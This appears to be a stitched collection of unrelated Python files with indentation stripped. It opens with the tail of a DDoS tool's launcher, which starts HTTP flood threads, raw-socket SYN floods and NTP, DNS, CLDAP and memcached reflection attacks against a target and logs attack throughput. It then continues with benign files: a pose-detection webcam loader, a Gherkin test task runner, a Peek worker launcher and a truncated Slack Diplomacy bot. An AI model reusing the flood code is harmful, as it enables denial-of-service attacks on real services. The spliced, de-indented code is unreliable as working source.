if not uagents: exit("Empty Useragent File ")
if not referers: exit("Empty Referer File ")
if threads > 1000:
logger.warning("Thread is higher than 1000")
if rpc > 100:
logger.warning(
"RPC (Request Pre Connection) is higher than 100")
proxies = handleProxyList(con, proxy_li, proxy_ty, url)
for thread_id in range(threads):
HttpFlood(thread_id, url, host, method, rpc, event,
uagents, referers, proxies).start()
if method in Methods.LAYER4_METHODS:
target = URL(urlraw)
port = target.port
target = target.host
try:
target = gethostbyname(target)
except Exception as e:
exit('Cannot resolve hostname ', url.host, e)
if port > 65535 or port < 1:
exit("Invalid Port [Min: 1 / Max: 65535] ")
if method in {"NTP", "DNS", "RDP", "CHAR", "MEM", "CLDAP", "ARD", "SYN"} and \
not ToolsConsole.checkRawSocket():
exit("Cannot Create Raw Socket")
threads = int(argv[3])
timer = int(argv[4])
proxies = None
ref = None
if not port:
logger.warning("Port Not Selected, Set To Default: 80")
port = 80
if len(argv) >= 6:
argfive = argv[5].strip()
if argfive:
refl_li = Path(__dir__ / "files" / argfive)
if method in {"NTP", "DNS", "RDP", "CHAR", "MEM", "CLDAP", "ARD"}:
if not refl_li.exists():
exit("The reflector file doesn't exist")
if len(argv) == 7:
logger.setLevel("DEBUG")
ref = set(a.strip()
for a in ProxyTools.Patterns.IP.findall(
refl_li.open("r+").read()))
if not ref: exit("Empty Reflector File ")
elif argfive.isdigit() and len(argv) >= 7:
if len(argv) == 8:
logger.setLevel("DEBUG")
proxy_ty = int(argfive)
proxy_li = Path(__dir__ / "files/proxies" / argv[6].strip())
proxies = handleProxyList(con, proxy_li, proxy_ty)
if method not in {"MINECRAFT", "MCBOT", "TCP", "CPS", "CONNECTION"}:
exit("this method cannot use for layer4 proxy")
else:
logger.setLevel("DEBUG")
for _ in range(threads):
Layer4((target, port), ref, method, event,
proxies).start()
logger.info(
"Attack Started to %s with %s method for %s seconds, threads: %d!"
% (target or url.human_repr(), method, timer, threads))
event.set()
ts = time()
while time() < ts + timer:
logger.debug('PPS: %s, BPS: %s / %d%%' %
(Tools.humanformat(int(REQUESTS_SENT)),
Tools.humanbytes(int(BYTES_SEND)),
round((time() - ts) / timer * 100, 2)))
REQUESTS_SENT.set(0)
BYTES_SEND.set(0)
sleep(1)
event.clear()
exit()
ToolsConsole.usage()
|
webcam_detector.py | from itertools import count
from threading import Thread
from queue import Queue
import os
import cv2
import numpy as np
import time
import torch
import torch.multiprocessing as mp
from loguru import logger
from alphapose.utils.presets import SimpleTransform
from multiprocessing.synchronize import Event as EventType
from config.apis import get_detector
## fork from alphapose.util.webcam_detector
class WebCamDetectionLoader():
def __init__(self,pose_cfg, opt):
self.cfg = pose_cfg
self.opt = opt
self._input_size = pose_cfg.DATA_PRESET.IMAGE_SIZE
self._output_size = pose_cfg.DATA_PRESET.HEATMAP_SIZE
self._sigma = pose_cfg.DATA_PRESET.SIGMA
if pose_cfg.DATA_PRESET.TYPE == 'simple':
self.transformation = SimpleTransform(
self, scale_factor=0,
input_size=self._input_size,
output_size=self._output_size,
rot=0, sigma=self._sigma,
train=False, add_dpg=False)
self._stopped = mp.Value('b', False)
if(opt.realtime==True):self.opt.inqsize=2
self.pose_queue = mp.Queue(maxsize=self.opt.inqsize)
self.loadedEvent = mp.Event()
self.runningEvent = mp.Event()
self.detector = None
# self.__set_input(input_source)
# self.path = mp.Value('i',-1)
self.path = mp.Queue(maxsize=1)
def __set_input(self,input_source):
stream = cv2.VideoCapture(input_source)
assert stream.isOpened(), 'Cannot capture source'
# self.path.value = int(input_source)
logger.info('input:{}',input_source)
self.path.put(input_source)
stream.release()
def start_worker(self, target):
p = mp.Process(target=target,name='WebCamDetector',args=())
p.start()
return p
def start(self,startEvent=None):
# start a thread to pre process images for object detection
self.startEvent = startEvent
logger.info('start:')
print(self.startEvent)
image_preprocess_worker = self.start_worker(self.frame_preprocess)
# self.image_preprocess_worker = image_preprocess_worker
return [image_preprocess_worker]
def run(self,input_source):
self.__set_input(input_source)
self.runningEvent.set()
@logger.catch
def stop(self):
# end threads
self._stopped.value = True
self.runningEvent.set()
self.clear_queues()
self.pose_queue.put((None, None, None, None, None, None,None))
# self.image_preprocess_worker.join()
# clear queues
def terminate(self):
self._stopped.value = True
self.stop()
def clear_queues(self):
self.clear(self.pose_queue)
def clear(self, queue):
while not queue.empty():
queue.get()
def wait_and_put(self, queue, item):
if not self.stopped:
queue.put(item)
queue.get() if self.opt.realtime and queue.qsize()>1 else time.sleep(0.01)
def wait_and_get(self, queue):
if not self.stopped:
return queue.get()
def __load_model(self):
self.detector = get_detector(self.opt)
self.detector.load_model() ##
def hangUp(self):
self.runningEvent.clear()
self.clear_queues()
def onStop(self):
self.clear_queues()
logger.debug('on stop')
self.pose_queue.put((None, None, None, None, None, None,None))
@logger.catch
def frame_preprocess(self):
logger.info('%s Process (%s)' % (self.__class__,os.getpid()))
if (self.detector is None):self.__load_model()
self.loadedEvent.set()
if(isinstance(self.startEvent,EventType)):self.startEvent.wait()
while True:
assert self.startEvent.is_set(),'Detector not started'
self.runningEvent.wait()
if self.stopped:
self.onStop()
return
inputpath = self.path.get()
logger.info('input:{}',inputpath)
stream = cv2.VideoCapture(inputpath)
assert stream.isOpened(), 'Cannot capture source'
for i in count():
if self.stopped: #停止
stream.release()
self.onStop()
return
if not self.runningEvent.is_set(): #暂停
stream.release()
self.hangUp()
break
if not self.pose_queue.full():
(grabbed, frame) = stream.read()
if not grabbed: #往输出队列放入空对象,continue
logger.debug('not grabbed')
self.wait_and_put(self.pose_queue, (None, None, None, None, None, None, None))
stream.release()
return
#预处理
# expected frame shape like (1,3,h,w) or (3,h,w)
img_k = self.detector.image_preprocess(frame)
if isinstance(img_k, np.ndarray):
img_k = torch.from_numpy(img_k)
# add one dimension at the front for batch if image shape (3,h,w)
if img_k.dim() == 3:
img_k = img_k.unsqueeze(0)
im_dim_list_k = frame.shape[1], frame.shape[0]
orig_img = frame[:, :, ::-1]
im_name = str(i) + '.jpg'
with torch.no_grad():
# Record original image resolution
im_dim_list_k = torch.FloatTensor(im_dim_list_k).repeat(1, 2)
img_det = self.image_detection((img_k, orig_img, im_name, im_dim_list_k)) #目标检测
self.image_postprocess(img_det) #后处理
def image_detection(self, inputs):
img, orig_img, im_name, im_dim_list = inputs
if img is None or self.stopped:
return (None, None, None, None, None, None, None)
with torch.no_grad():
dets = self.detector.images_detection(img, im_dim_list)
if isinstance(dets, int) or dets.shape[0] == 0:
return (orig_img, im_name, None, None, None, None, None)
if isinstance(dets, np.ndarray):
dets = torch.from_numpy(dets)
dets = dets.cpu()
boxes = dets[:, 1:5]
scores = dets[:, 5:6]
if self.opt.tracking:
ids = dets[:, 6:7]
else:
ids = torch.zeros(scores.shape)
boxes_k = boxes[dets[:, 0] == 0]
if isinstance(boxes_k, int) or boxes_k.shape[0] == 0:
return (orig_img, im_name, None, None, None, None, None)
inps = torch.zeros(boxes_k.size(0), 3, *self._input_size)
cropped_boxes = torch.zeros(boxes_k.size(0), 4)
return (orig_img, im_name, boxes_k, scores[dets[:, 0] == 0], ids[dets[:, 0] == 0], inps, cropped_boxes)
def image_postprocess(self, inputs):
with torch.no_grad():
(orig_img, im_name, boxes, scores, ids, inps, cropped_boxes) = inputs
if orig_img is None or self.stopped:
logger.debug('not grabbed')
self.wait_and_put(self.pose_queue, (None, None, None, None, None, None, None))
return
if boxes is None or boxes.nelement() == 0:
self.wait_and_put(self.pose_queue, (None, orig_img, im_name, boxes, scores, ids, None))
return
# imght = orig_img.shape[0]
# imgwidth = orig_img.shape[1] print(type(box))
for i, box in enumerate(boxes):
inps[i], cropped_box = self.transformation.test_transform(orig_img, box)
# if not hasattr(self,'checksize'):
# print(orig_img.shape)
# print(inps[i].shape)
# self.checksize = True
cropped_boxes[i] = torch.FloatTensor(cropped_box)
# inps, cropped_boxes = self.transformation.align_transform(orig_img, boxes)
self.wait_and_put(self.pose_queue, (inps, orig_img, im_name, boxes, scores, ids, cropped_boxes))
def read(self):
return self.wait_and_get(self.pose_queue)
@property
def stopped(self):
return self._stopped.value
@property
def joint_pairs(self):
"""Joint pairs which defines the pairs of joint to be swapped
when the image is flipped horizontally."""
return [[1, 2], [3, 4], [5, 6], [7, 8],
[9, 10], [11, 12], [13, 14], [15, 16]]
|
task_runner.py | import datetime
import os
import glob
from typing import Any, Optional, Union
from gherkin.token_scanner import TokenScanner
from gherkin.parser import Parser
from .junit_report import JUnitReport
from .feedback_adapter import FeedbackAdapter
from .scenario_result import ScenarioResult
from .feedback_schema import FeatureInfo, ScenarioFeedback
import inspect
from .helpers import excludeKeys
from .report import Report
from .testresult_info import TestResultInfo
from .timeline import Timeline
from .task import Task
from .scenario_context import ScenarioContext
import threading
import concurrent
from .color import bcolors
from concurrent.futures import ThreadPoolExecutor, wait, ProcessPoolExecutor
from .scenario import Scenario
from itertools import groupby
import multiprocessing
from gherkin.token_matcher import TokenMatcher
from gherkin.dialect import Dialect
from .custom_keywords import concurrent_keywords, match_stepline
from .dependency_graph import DependencyGraph
import uuid
import time
import signal
from .task_monitor import TaskMonitor
from .task_runner_config import TaskRunnerConfig
from .feedback import Feedback
from dataclasses import asdict
Dialect.concurrent_keywords = concurrent_keywords
TokenMatcher.match_StepLine = match_stepline
class TaskRunner:
def __init__(self,debugMode=False,timeout=3600) -> None:
self.parser = Parser()
self.completedTasks: list[str] = []
self.groups = {}
self.pool = ThreadPoolExecutor()
self.parallelPool = ProcessPoolExecutor(max_workers=multiprocessing.cpu_count(),mp_context=multiprocessing.get_context("spawn"))
self.taskReport = []
self.setupTasks: list[Task] = []
self.teardownTasks: list[Task] = []
self.allTaskIds: list[str] = []
self.mainTasks: list[Task] = []
self.debugMode: bool = debugMode
self.testResult: TestResultInfo = None
self.timeout = timeout
self.taskMonitor = TaskMonitor()
self.feedback = Feedback()
def run(self, options: Union[list[str],TaskRunnerConfig]) -> TestResultInfo:
if isinstance(options,TaskRunnerConfig):
if len(options.featureFiles) > 0:
files = self.__getAllFeatureFiles(options.featureFiles)
for file in files:
self.__parse(file, options.onlyRunScenarioTags)
else:
files = self.__getAllFeatureFiles(options)
for file in files:
self.__parse(file, [])
start = time.time()
startDate = datetime.datetime.now().strftime("%m/%d/%Y, %H:%M:%S")
self.taskMonitor.start()
self.feedback.startFeedback()
## run any setup tasks
error = self.__runSetupTasks()
if not error:
## run main tasks
self.__runMainTasks()
## run any teardown tasks
error = self.__runTeardownTasks()
end = time.time()
endDate = datetime.datetime.now().strftime("%m/%d/%Y, %H:%M:%S")
self.taskMonitor.cancel()
self.taskMonitor.join()
self.taskMonitor.pids = list(dict.fromkeys(self.taskMonitor.pids))
for pid in self.taskMonitor.pids:
self.__print(f"kill process id: {pid}")
try:
os.kill(pid, signal.SIGTERM)
except:
pass
## print test report
self.__printTestReport()
self.testResult = TestResultInfo(
elapsed=end-start,
start=startDate,
end=endDate,
numCpu=multiprocessing.cpu_count(),
pid=os.getpid(),
success=len(list(filter(lambda x: "failed" in x["status"], self.taskReport))) <= 0
)
self.feedback.stopFeedback()
return self.testResult
def __getAllFeatureFiles(self, paths: list[str]) -> list[str]:
featureFiles: list[str] = []
for p in paths:
fullPath = os.path.abspath(p)
if os.path.isfile(fullPath):
if fullPath not in featureFiles:
featureFiles.append(fullPath)
elif os.path.isdir(fullPath):
files = glob.glob(fullPath + '/**/*.feature', recursive=True)
for file in files:
if file not in featureFiles:
featureFiles.append(file)
return featureFiles
def __parse(self, featureFile: str, onlyTags: list[str]):
result = self.parser.parse(TokenScanner(featureFile))
if not result:
return
if "feature" not in result:
return
if "children" not in result["feature"]:
return
feature = result["feature"]
for child in feature["children"]:
if "scenario" in child:
sc = child["scenario"]
self.__getScenario(sc, feature, onlyTags)
# def __getFeatureId(self, feature: Any) -> str:
# tags = feature["tags"]
# id=uuid.uuid4().hex()
# for tag in tags:
# tg = tag["name"]
# if temp := self.__getIdTag(tg, tag): id = temp
# return id
def __getScenario(self, scenario: Any, feature: Any, onlyIncludeTags: list[str]) -> Optional[Task]:
tags = scenario["tags"]
isConcurrent,id,depends,dependsGroups,group,runAlways,isSetup,isTeardown,isParallel = False,uuid.uuid4().hex,[],[],None,False,False,False,False
# if scenario tags filtering is specified an scenario does not have any tag then exclude this scenario
if len(onlyIncludeTags) > 0 and len(tags) <= 0:
return None
# filter scenario based on tags
if len(onlyIncludeTags) > 0:
if not any(item["name"] in onlyIncludeTags for item in tags):
return None
for tag in tags:
tg = tag["name"]
if temp := self.__getConcurrentTag(tg): isConcurrent = temp
if temp := self.__getParallelTag(tg): isParallel = temp
if temp := self.__getRunAlwaysTag(tg): runAlways = temp
if temp := self.__getSetupTag(tg): isSetup = temp
if temp := self.__getTeardownTag(tg): isTeardown = temp
if temp := self.__getIdTag(tg, tag): id = temp
if temp := self.__getDependsTag(tg, tag): depends.append(temp)
if temp := self.__getDependsGroupsTag(tg, tag): dependsGroups.append(temp)
if temp := self.__getGroupTag(tg, tag): group = temp
sc = Scenario(scenario["name"],scenario,feature,id)
t = Task(scenario["name"], sc, feature, id,depends,dependsGroups,runAlways,group, isSetup, isConcurrent,isTeardown,isParallel)
self.allTaskIds.append(t.id)
if group is not None:
self.groups.setdefault(group, []).append(id)
if isSetup:
self.setupTasks.append(t)
elif isTeardown:
self.teardownTasks.append(t)
else:
self.mainTasks.append(t)
return t
def __getGroupTag(self, name: str, tag: Any) -> Optional[str]:
return tag["name"].split("@group_")[-1] if name.startswith("@group_") else None
def __getIdTag(self, name: str, tag: Any) -> Optional[str]:
return tag["name"].split("@id_")[-1] if name.startswith("@id_") else None
def __getConcurrentTag(self, name: str) -> bool:
return name == "@concurrent"
def __getParallelTag(self, name: str) -> bool:
return name == "@parallel"
def __getRunAlwaysTag(self, name: str) -> bool:
return name == "@runAlways"
def __getDependsTag(self, name: str, tag: Any) -> Optional[str]:
return tag["name"].split("@depends_")[-1] if name.startswith("@depends_") else None
def __getDependsGroupsTag(self, name: str, tag: Any) -> Optional[str]:
return tag["name"].split("@dependsGroups_")[-1] if name.startswith("@dependsGroups_") else None
def __getSetupTag(self, name: str) -> bool:
return name == "@setup"
def __getTeardownTag(self, name: str) -> bool:
return name == "@teardown"
def __getNextTask(self,taskList) -> list[Task]:
new_tasks: list[Task] = []
skipped_tasks: list[Task] = []
self.__print(f"tasks pending: {[(f'name: {t.name}',f'id:{t.id}') for t in taskList]}")
for task in taskList:
self.__print(f"check pending task: (name:{task.name},id:{task.id})")
if len(task.depends) > 0:
self.__print(f"task (name:{task.name},id:{task.id}) depends on: {task.depends}")
if not set(task.depends).issubset(self.allTaskIds):
self.__addTaskToReport(task, "skipped", None, 0.0, None)
skipped_tasks.append(task)
self.completedTasks.append(task.id)
continue
if not set(task.depends).issubset(self.completedTasks):
continue
if self.__isParentTaskFailed(task.depends) and not task.runAlways:
self.__addTaskToReport(task, "skipped", None, 0.0, None)
self.__print(f"skip task: (name:{task.name},id:{task.id})")
skipped_tasks.append(task)
self.completedTasks.append(task.id)
continue
if len(task.dependsGroups) > 0:
self.__print(f"task (name:{task.name},id:{task.id}) depends on groups: {task.dependsGroups}")
combine_groups = []
for g in task.dependsGroups:
if g in self.groups:
combine_groups += self.groups[g]
if not bool(combine_groups):
self.__print(f"no groups matching found for task: (name:{task.name},id:{task.id})")
self.__addTaskToReport(task, "skipped", None, 0.0, None)
skipped_tasks.append(task)
self.completedTasks.append(task.id)
continue
if not set(combine_groups).issubset(self.completedTasks):
continue
if self.__isParentTaskFailed(combine_groups) and not task.runAlways:
self.__addTaskToReport(task, "skipped", None, 0.0, None)
self.__print(f"dependent tasks failed so skip task: (name:{task.name},id:{task.id})")
skipped_tasks.append(task)
self.completedTasks.append(task.id)
continue
new_tasks.append(task)
if len(skipped_tasks) > 0:
taskList = [i for i in taskList if not any(x.id == i.id for x in skipped_tasks)]
if len(new_tasks) > 0:
taskList = [i for i in taskList if not any(x.id == i.id for x in new_tasks)]
return new_tasks, taskList
def runWorkerThread(self, taskList):
tasks_to_submit, taskList = self.__getNextTask(taskList)
futures = {}
for task in tasks_to_submit:
if task.isConcurrent:
futures[self.pool.submit(task.scenario.run,queue=None, feedbackQueue=self.feedback.messageQueue,context=self.__scenarioContextFromTask(task))] = task
elif task.isParallel:
futures[self.parallelPool.submit(task.scenario.run,queue=self.taskMonitor.signalQueue,feedbackQueue=self.feedback.messageQueue,context=self.__scenarioContextFromTask(task))] = task
self.__print(f"adding new tasks: {[(f'name: {t.name}',f'id:{t.id}') for t in tasks_to_submit]}")
self.__print(f"tasks in pool: {[(f'name: {t.name}',f'id:{t.id}') for t in futures.values()]}")
startTime = time.time()
currentTimeout = self.timeout
while futures:
done, notDone = wait(futures,return_when=concurrent.futures.FIRST_COMPLETED,timeout=currentTimeout)
endTime = time.time()
elapsed = endTime-startTime
self.__print(f"elapsed time waiting for task to complete: {elapsed}")
if elapsed >= currentTimeout:
for c in notDone:
self.__print(f"tasks not done: (name:{futures[c].name},id:{futures[c].id}, running:{c.running()},cancelled:{c.cancelled()})")
self.__addTaskToReport(futures[c],"failed","timeout waiting for task to complete",self.timeout, None)
self.__print(f"timeout waiting {self.timeout} (s) for remaining tasks to complete. Aborting.")
break
currentTimeout = currentTimeout - elapsed
self.__print(f"Remaining timeout: {currentTimeout}")
for c in done:
fut = futures.pop(c)
result = c.result()
print(result.message)
self.__print(f"task completed: (name:{fut.name},id:{result.id})")
self.completedTasks.append(result.id)
if result.exception is not None:
self.__addTaskToReport(fut,"failed",result.exception,result.elapsed, result)
else:
self.__addTaskToReport(fut,"success",result.exception,result.elapsed, result)
next_tasks,taskList = self.__getNextTask(taskList)
if next_tasks is not None:
for t in next_tasks:
self.__print(f"adding new task (name:{t.name},id:{t.id})")
if t.isConcurrent:
item = self.pool.submit(t.scenario.run,queue=None,feedbackQueue=self.feedback.messageQueue,context=self.__scenarioContextFromTask(t))
futures[item] = t
elif t.isParallel:
item = self.parallelPool.submit(t.scenario.run,queue=self.taskMonitor.signalQueue,feedbackQueue=self.feedback.messageQueue,context=self.__scenarioContextFromTask(t))
futures[item] = t
self.__print(f"remaining tasks in pool: {[(f'name: {t.name}',f'id:{t.id}') for t in futures.values()]}")
def __printTestReport(self):
print(f"Test report:\n")
for key, group in groupby(sorted(self.taskReport,key=lambda x:x["feature"]), lambda x: x["feature"]):
print(f"\nFeature: {key}\n")
for t in group:
if t['status'] == 'success':
print(f"\tScenario: {t['name']}: {bcolors.OKGREEN}{t['status']}{bcolors.ENDC} (elapsed {t['elapsed']})")
elif t['status'] == 'skipped':
print(f"\tScenario: {t['name']}: {bcolors.WARNING}{t['status']}{bcolors.ENDC} (elapsed {t['elapsed']})")
else:
print(f"\tScenario: {t['name']}: {bcolors.FAIL}{t['status']}{bcolors.ENDC} (elapsed {t['elapsed']})")
# if t['error'] is not None:
# print(f"\t\tError: {bcolors.FAIL}{t['error']}{bcolors.ENDC}")
#print(f"all steps report: {t['scenario']}")
if 'scenario' in t and t["scenario"] is not None:
if t['scenario'].steps:
for step in t["scenario"].steps:
status = step['status']
if status == 'failed':
print(f"\t Step: {step['keyword']}{step['text']}{bcolors.FAIL} {step['status']}{bcolors.ENDC} (elapsed {step['elapsed']})")
elif status == 'skipped':
print(f"\t Step: {step['keyword']}{step['text']}{bcolors.WARNING} {step['status']}{bcolors.ENDC} (elapsed {step['elapsed']})")
else:
print(f"\t Step: {step['keyword']}{step['text']}{bcolors.OKGREEN} {step['status']}{bcolors.ENDC} (elapsed {step['elapsed']})")
if "error" in step and step['error'] is not None:
print(f"\t\t{bcolors.FAIL}{step['error']}{bcolors.ENDC}")
def __scenarioContextFromTask(self,task: Task):
data = excludeKeys(asdict(task),["name","scenario","feature"])
return ScenarioContext(
**{
key: (data[key] if val.default == val.empty else data.get(key, val.default))
for key, val in inspect.signature(ScenarioContext).parameters.items()
}
)
def __print(self,msg: str):
if self.debugMode:
print(f"{bcolors.OKCYAN}[{datetime.datetime.now().strftime('%m/%d/%Y, %H:%M:%S')} task_manager] {msg}{bcolors.ENDC}\n")
def __isParentTaskFailed(self, groups):
ptask = []
for t in self.taskReport:
if 'id' in t:
if any(t['id'] == x for x in groups):
ptask.append(t)
return any(y['status'] == "failed" or y['status'] == "skipped" for y in ptask)
def __addTaskToReport(self, task: Task, status: str, error: str, elapsed: float, scenarioResult: Any):
if not any(task.name == x["name"] and task.feature["name"] == x["feature"] for x in self.taskReport):
self.taskReport.append({"name":task.name,"status":status,"error":error, "elapsed": elapsed, "id": task.id, "feature": task.feature["name"], "task": task, "scenario": scenarioResult})
self.feedback.notify(asdict(self.__feedbackSchemaFromTaskResult(task,scenarioResult,status,error,elapsed)))
def __runMainTasks(self):
return self.__runTasks(self.mainTasks)
def __runSetupTasks(self):
return self.__runTasks(self.setupTasks)
def __runTeardownTasks(self):
return self.__runTasks(self.teardownTasks)
def __transformSeqTasks(self, taskList: list[Task]):
dependTaskId = None
for t in taskList:
t.isConcurrent = True
if dependTaskId is not None and len(t.depends) <= 0 and len(t.dependsGroups) <= 0:
t.depends.append(dependTaskId)
dependTaskId = t.id
return taskList
def __runTasks(self, taskList):
error = False
seqtasks = list(filter(lambda x: not x.isConcurrent and not x.isParallel, taskList))
contasks = list(filter(lambda x: x.isConcurrent or x.isParallel, taskList))
seqtasks = self.__transformSeqTasks(seqtasks)
alltasks = contasks + seqtasks
self.__print(f"all tasks: {[t.name for t in alltasks]}")
workerThread = threading.Thread(target=self.runWorkerThread,kwargs={'taskList':alltasks})
workerThread.start()
workerThread.join()
if len(list(filter(lambda x: "failed" in x["status"], self.taskReport))) > 0:
error = True
return error
def __feedbackSchemaFromTaskResult(self,task: Task, scenarioResult: ScenarioResult,status: str, error: str, elapsed: float):
obj = ScenarioFeedback()
taskDict = asdict(task)
feedDict = asdict(obj)
obj = ScenarioFeedback(**{k:(taskDict[k] if k in taskDict else v) for k,v in feedDict.items()})
obj.status = status
obj.error = error
obj.elapsed = elapsed
if scenarioResult:
obj.threadId = scenarioResult.threadId
obj.pid = scenarioResult.pid
obj.name = scenarioResult.scenario["name"]
obj.column = scenarioResult.scenario["location"]["column"]
obj.line = scenarioResult.scenario["location"]["line"]
obj.tags = [t["name"] for t in scenarioResult.scenario["tags"]]
obj.description = scenarioResult.scenario["description"]
obj.numberOfSteps = len(scenarioResult.scenario["steps"])
if scenarioResult.startTime:
obj.startTime = scenarioResult.startTime
if scenarioResult.endTime:
obj.endTime = scenarioResult.endTime
if task.feature:
obj.featureInfo = FeatureInfo(
description=task.feature["description"],
name=task.feature["name"],
tags=[t["name"] for t in task.feature["tags"]]
)
return obj
def generateTimeline(self, outputFilename="timeline_output.html"):
timeline = Timeline()
timeline.generateTimeline(self.taskReport, outputFilename)
def generateDependencyGraph(self, outputFilename="dependency_output.html"):
depGraph = DependencyGraph()
depGraph.generateGraph(outputFilename,self.taskReport,self.groups)
def generateReport(self, outputFilename="report_output.html"):
report = Report()
report.generateReport(self.taskReport, self.testResult, outputFilename)
def registerFeedbackAdapter(self,adapter: FeedbackAdapter):
self.feedback.addAdapter(adapter)
def generateJUnitReport(self, outputFilename="junit_output.xml"):
report = JUnitReport()
report.generateReport(self.taskReport,self.testResult, outputFilename)
|
run_peek_worker.py | #!/usr/bin/env python
"""
Copyright Synerty Pty Ltd 2013
This software is proprietary, you are not free to copy
or redistribute this code in any format.
All rights to this software are reserved by
Synerty Pty Ltd
"""
import logging
import threading
from threading import Thread
from peek_platform import PeekPlatformConfig
from peek_platform.util.LogUtil import setupPeekLogger, updatePeekLoggerHandlers, \
setupLoggingToSysloyServer
from peek_plugin_base.PeekVortexUtil import peekWorkerName, peekServerName
from pytmpdir.Directory import DirSettings
from twisted.internet import reactor, defer
from txhttputil.site.FileUploadRequest import FileUploadRequest
from vortex.DeferUtil import vortexLogFailure
from vortex.VortexFactory import VortexFactory
setupPeekLogger(peekWorkerName)
logger = logging.getLogger(__name__)
def setupPlatform():
from peek_platform import PeekPlatformConfig
PeekPlatformConfig.componentName = peekWorkerName
# Tell the platform classes about our instance of the pluginSwInstallManager
from peek_worker.sw_install.PluginSwInstallManager import PluginSwInstallManager
PeekPlatformConfig.pluginSwInstallManager = PluginSwInstallManager()
# Tell the platform classes about our instance of the PeekSwInstallManager
from peek_worker.sw_install.PeekSwInstallManager import PeekSwInstallManager
PeekPlatformConfig.peekSwInstallManager = PeekSwInstallManager()
# Tell the platform classes about our instance of the PeekLoaderBase
from peek_worker.plugin.WorkerPluginLoader import WorkerPluginLoader
PeekPlatformConfig.pluginLoader = WorkerPluginLoader()
# The config depends on the componentName, order is important
from peek_worker.PeekWorkerConfig import PeekWorkerConfig
PeekPlatformConfig.config = PeekWorkerConfig()
# Update the version in the config file
from peek_worker import __version__
PeekPlatformConfig.config.platformVersion = __version__
# Set default logging level
logging.root.setLevel(PeekPlatformConfig.config.loggingLevel)
updatePeekLoggerHandlers(PeekPlatformConfig.componentName,
PeekPlatformConfig.config.loggingRotateSizeMb,
PeekPlatformConfig.config.loggingRotationsToKeep,
PeekPlatformConfig.config.logToStdout)
if PeekPlatformConfig.config.loggingLogToSyslogHost:
setupLoggingToSysloyServer(PeekPlatformConfig.config.loggingLogToSyslogHost,
PeekPlatformConfig.config.loggingLogToSyslogPort,
PeekPlatformConfig.config.loggingLogToSyslogFacility)
# Enable deferred debugging if DEBUG is on.
if logging.root.level == logging.DEBUG:
defer.setDebugging(True)
# If we need to enable memory debugging, turn that on.
if PeekPlatformConfig.config.loggingDebugMemoryMask:
from peek_platform.util.MemUtil import setupMemoryDebugging
setupMemoryDebugging(PeekPlatformConfig.componentName,
PeekPlatformConfig.config.loggingDebugMemoryMask)
# The worker doesn't need any threads
reactor.suggestThreadPoolSize(1)
# Initialise the txhttputil Directory object
DirSettings.defaultDirChmod = PeekPlatformConfig.config.DEFAULT_DIR_CHMOD
DirSettings.tmpDirPath = PeekPlatformConfig.config.tmpPath
FileUploadRequest.tmpFilePath = PeekPlatformConfig.config.tmpPath
# Configure the celery app in the worker
# This is not the worker that will be started, it allows the worker to queue tasks
from peek_platform.ConfigCeleryApp import configureCeleryApp
from peek_platform import PeekPlatformConfig
from peek_plugin_base.worker.CeleryApp import celeryApp
configureCeleryApp(celeryApp, PeekPlatformConfig.config)
def twistedMain():
# defer.setDebugging(True)
# sys.argv.remove(DEBUG_ARG)
# import pydevd
# pydevd.settrace(suspend=False)
# Make the agent restart when the server restarts, or when it looses connection
def restart(status):
from peek_platform import PeekPlatformConfig
PeekPlatformConfig.peekSwInstallManager.restartProcess()
(VortexFactory.subscribeToVortexStatusChange(peekServerName)
.filter(lambda online: online == False)
.subscribe(on_next=restart)
)
# First, setup the VortexServer Worker
from peek_platform import PeekPlatformConfig
d = VortexFactory.createTcpClient(PeekPlatformConfig.componentName,
PeekPlatformConfig.config.peekServerHost,
PeekPlatformConfig.config.peekServerVortexTcpPort)
d.addErrback(vortexLogFailure, logger, consumeError=True)
# Software update check is not a thing any more
# Start Update Handler,
# Add both, The peek client_fe_app might fail to connect, and if it does, the payload
# sent from the peekSwUpdater will be queued and sent when it does connect.
# d.addBoth(lambda _: peekSwVersionPollHandler.start())
# Load all Plugins
d.addBoth(lambda _: logger.info("Loading all Peek Plugins"))
d.addBoth(lambda _: PeekPlatformConfig.pluginLoader.loadCorePlugins())
d.addBoth(lambda _: PeekPlatformConfig.pluginLoader.loadOptionalPlugins())
d.addBoth(lambda _: logger.info("Starting all Peek Plugins"))
d.addBoth(lambda _: PeekPlatformConfig.pluginLoader.startCorePlugins())
d.addBoth(lambda _: PeekPlatformConfig.pluginLoader.startOptionalPlugins())
# Log Exception, convert the errback to callback
d.addErrback(vortexLogFailure, logger, consumeError=True)
# Log that the reactor has started
d.addCallback(lambda _:
logger.info('Peek Worker is running, version=%s',
PeekPlatformConfig.config.platformVersion))
# Unlock the mutex
d.addCallback(lambda _: twistedPluginsLoadedMutex.release())
d.addErrback(vortexLogFailure, logger, consumeError=True)
# Run the reactor in a thread
reactor.callLater(0, logger.info, "Reactor started")
reactor.run(installSignalHandlers=False)
def celeryMain():
from peek_platform import PeekPlatformConfig
# Load all Plugins
logger.info("Starting Celery")
from peek_worker import CeleryApp
CeleryApp.start(PeekPlatformConfig.config)
# Create the startup mutex, twisted has to load the plugins before celery starts.
twistedPluginsLoadedMutex = threading.Lock()
assert twistedPluginsLoadedMutex.acquire()
def setPeekWorkerRestarting():
global peekWorkerRestarting
peekWorkerRestarting = True
def main():
setupPlatform()
# Initialise and run all the twisted stuff in another thread.
twistedMainLoopThread = Thread(target=twistedMain)
twistedMainLoopThread.start()
# Block until twisted has released it's lock
twistedPluginsLoadedMutex.acquire()
# Start the celery blocking main thread
celeryMain()
logger.info("Celery has shutdown")
# Shutdown the Vortex
VortexFactory.shutdown()
if PeekPlatformConfig.peekSwInstallManager.restartTriggered:
logger.info("Restarting Peek Worker")
PeekPlatformConfig.peekSwInstallManager.realyRestartProcess()
else:
# Tell twisted to stop
logger.info("Shutting down twisted reactor.")
reactor.callFromThread(reactor.stop)
# Wait for twisted to stop
twistedMainLoopThread.join()
logger.info("Reactor shutdown complete.")
PeekPlatformConfig.pluginLoader.stopCorePlugins()
PeekPlatformConfig.pluginLoader.stopOptionalPlugins()
PeekPlatformConfig.pluginLoader.unloadCorePlugins()
PeekPlatformConfig.pluginLoader.unloadOptionalPlugins()
logger.info("Worker Service shutdown complete.")
if __name__ == '__main__':
main()
|
diplomacyBot.py | import re
import time
import random
import pickle
import threading
from diplomacyMap import Map
from diplomacyLogic import *
from slackclient import SlackClient
from slackbot_settings import API_TOKEN, DIPLOMACY_CHANNEL
RTM_READ_DELAY = 0 # 1 second delay between reading from RTM
MENTION_REGEX = "^<@(|[WU].+?)>(.*)"
class diplomacyBot():
def __init__(self):
